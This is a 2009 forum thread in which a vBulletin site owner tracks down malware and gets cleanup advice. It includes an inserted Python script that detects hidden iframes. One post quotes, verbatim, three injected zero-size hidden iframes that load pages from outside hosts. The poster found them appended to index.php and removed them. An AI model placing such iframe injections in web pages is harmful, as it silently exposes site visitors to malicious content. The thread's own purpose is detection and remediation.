  #1  
Old 08-23-2009, 03:17 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Thanks given: 0 times
Thanked 0 times in 0 posts
Default Malware ... but where?!.. AHHHH!

I think the title shows all. My forum, http://www.adminfuel.com, gives the error that some sort of malware is present. However, I cannot find anything to do with this. Are there certain areas I should check?

Thanks
  #2  
Old 08-23-2009, 03:21 PM
toonysnn toonysnn is offline
 
Join Date: Sep 2006
Location: Texas
Posts: 511
Thanks given: 0 times
Thanked 0 times in 0 posts
Default

Let me install my AV and I'll tell you. Lol
  #3  
Old 08-23-2009, 03:23 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Thanks given: 0 times
Thanked 0 times in 0 posts
Default

Haha.. thanks
  #4  
Old 08-23-2009, 03:34 PM
toonysnn toonysnn is offline
 
Join Date: Sep 2006
Location: Texas
Posts: 511
Thanks given: 0 times
Thanked 0 times in 0 posts
Default

No problem, but one thing I'd suggest, check your index.php and global.php files. If there's something there at the top besides /*=========*\||vbstuff||etc.. then delete it.
  #5  
Old 08-23-2009, 03:42 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Thanks given: 0 times
Thanked 0 times in 0 posts
Default

Thanks, I had a look, and there was nothing there BUT I had a look at the end of the index.php file and I found an iframe after the PHP tag closes:

<iframe src="http://google-stat.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/arwe/?736361acd09ca9717c9462514beb5205" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

I have removed this, is that the right thing?
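An added example (not part of the original thread, and not vBulletin code): a small Python scan for the pattern found in post #5, a hidden or zero-sized iframe sitting outside the PHP tags of a .php file, whether at the top or after the closing tag. The function names, the sample files and the example.invalid host are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# A PHP block: "<?php ... ?>", or an unclosed block running to end of file.
# Heuristic: a "?>" inside a PHP string would end the match early.
PHP_BLOCK = re.compile(r"<\?(?:php|=)?.*?(?:\?>|\Z)", re.S | re.I)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")

def outside_php(source):
    """Return only the text PHP would emit verbatim (outside PHP tags)."""
    return PHP_BLOCK.sub("\n", source)

def hidden_iframes(source):
    """List src values of zero-sized or hidden iframes outside PHP blocks."""
    hits = []
    for tag in IFRAME.findall(outside_php(source)):
        attrs = {k.lower(): v.strip("\"'") for k, v in ATTR.findall(tag)}
        zero = attrs.get("width") == "0" or attrs.get("height") == "0"
        styled = re.search(r"hidden|display\s*:\s*none", attrs.get("style", ""), re.I)
        if zero or styled:
            hits.append(attrs.get("src", ""))
    return hits

def scan_tree(root):
    """Map each .php file under root to the hidden iframe sources found in it."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = hidden_iframes(path.read_text(errors="replace"))
        if found:
            report[path.name] = found
    return report

def demo():
    # Constructed sample files; example.invalid is a placeholder host.
    injected = ('<?php\nrequire_once("./global.php");\n?>'
                '<iframe src="http://example.invalid/a/?t=2" width=0 height=0 '
                'style="hidden" frameborder=0></iframe>')
    clean = '<?php\n$html = "<iframe src=\'/ok\' width=0></iframe>";\necho $html;\n'
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text(injected)
        Path(root, "global.php").write_text(clean)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

A hit only shows where markup was appended; how the file was modified still has to be established separately, which is what the later posts about upgrading, passwords and the hosting provider address.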
  #6  
Old 08-23-2009, 03:44 PM
toonysnn toonysnn is offline
 
Join Date: Sep 2006
Location: Texas
Posts: 511
Thanks given: 0 times
Thanked 0 times in 0 posts
Default

That wouldn't do anything anyways. print_output() on that last eval() code disables any further code to be printed.

First of all, I'd suggest you upgrade to at least 3.8.3.

I do not see any suspicious code besides that one in the source, but in Firefox, your style is broken due to the "Reported Attack Site" window. I had to switch to IE8 for viewing your site.
Even in IE8, it doesn't show up. I also used w3 validator.
  #7  
Old 08-23-2009, 03:57 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Thanks given: 0 times
Thanked 0 times in 0 posts
Default

Been on holiday so couldn't update. Doing now, bit annoying with the error, but I am submitting to Google to recheck.
  #8  
Old 08-23-2009, 03:59 PM
toonysnn toonysnn is offline
 
Join Date: Sep 2006
Location: Texas
Posts: 511
Thanks given: 0 times
Thanked 0 times in 0 posts
Default

rockinaway, at this point I'd have to suggest this:

For security reasons, I'd contact your hosting provider. (Which, according to Google, is Dreamhost?) You should contact them and request that they do a security audit on the server you're located on.

You should change your passwords to something more secure. (eg: cv%3m2Fwe!@#.RE - but note that you'll need to remember the password [clearly, lol])

You should run the vBulletin "Suspect File Versions" script via the administrator control panel.
To do this, go to:
Admin CP > Maintenance > Diagnostics > Suspect File Version

Once that has been completed, if you could screenshot the page (or in Firefox, use Screengrab and save/upload the entire frame) I'd try and tell you what to look for.
  #9  
Old 08-23-2009, 04:01 PM
rockinaway rockinaway is offline
 
Join Date: Jun 2005
Posts: 211
Thanks given: 0 times
Thanked 0 times in 0 posts
Default

I am on 3.8.1 now, if I want to update to the latest 3.8.4, which security patch would I download? I can't figure it out, haha... forgotten everything.

Before, I noticed a strange address appear when page loads, but now I don't see that. I will still contact my hosting provider.
  #10  
Old 08-23-2009, 04:04 PM
toonysnn toonysnn is offline
 
Join Date: Sep 2006
Location: Texas
Posts: 511
Thanks given: 0 times
Thanked 0 times in 0 posts
Default

Just download vBulletin as if you were downloading a new install. vBulletin Members Area - across from the same license for the board you're attempting to upgrade is a "Download vBulletin" and "Download ImpEx" link. The vB one is the one you want to click.

Even so, contacting your host and making sure there were no exploited services, up-to-date software, etc is all running fine, then it could be determined to a XSS flaw of some sort, or php script that is on the server.
All times are GMT.